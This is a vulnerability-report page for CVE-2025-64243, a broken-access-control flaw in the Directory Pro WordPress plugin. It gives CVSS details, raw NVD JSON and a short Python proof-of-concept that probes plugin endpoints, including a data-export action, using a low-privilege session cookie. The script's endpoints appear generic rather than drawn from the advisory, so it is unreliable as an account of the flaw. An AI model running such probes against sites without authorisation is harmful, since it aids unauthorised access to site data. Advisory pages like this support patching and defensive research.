Security Vulnerability Report
中文
CVE-2025-64243 CVSS 4.3 MEDIUM

CVE-2025-64243

Published: 2025-12-16 09:15:54
Last Modified: 2026-04-27 16:16:37

Description

Missing Authorization vulnerability in e-plugins Directory Pro directory-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directory Pro: from n/a through <= 2.5.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Directory Pro (WordPress) <= 2.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64243 PoC - Directory Pro Broken Access Control # Affected: Directory Pro <= 2.5.6 import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Low-privilege user session required cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', 'wordpress_logged_in_xxx': 'low_priv_user_token' } # Enumerate accessible directories without proper authorization endpoints = [ '/wp-json/directory-pro/v1/directories', '/wp-json/directory-pro/v1/listings', '/wp-admin/admin-ajax.php?action=get_directory_listings', '/wp-admin/admin-ajax.php?action=dp_export_data' ] for endpoint in endpoints: url = target + endpoint try: resp = requests.get(url, cookies=cookies, timeout=10) if resp.status_code == 200 and 'application/json' in resp.headers.get('Content-Type', ''): print(f'[+] Unauthorized access possible: {endpoint}') print(f'Response: {resp.text[:500]}') except Exception as e: print(f'[-] Error: {e}') # Note: Requires valid low-privilege WordPress account

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64243", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:53.907", "lastModified": "2026-04-27T16:16:36.927", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Directory Pro directory-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Directory Pro: from n/a through <= 2.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/directory-pro/vulnerability/wordpress-directory-pro-plugin-2-5-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}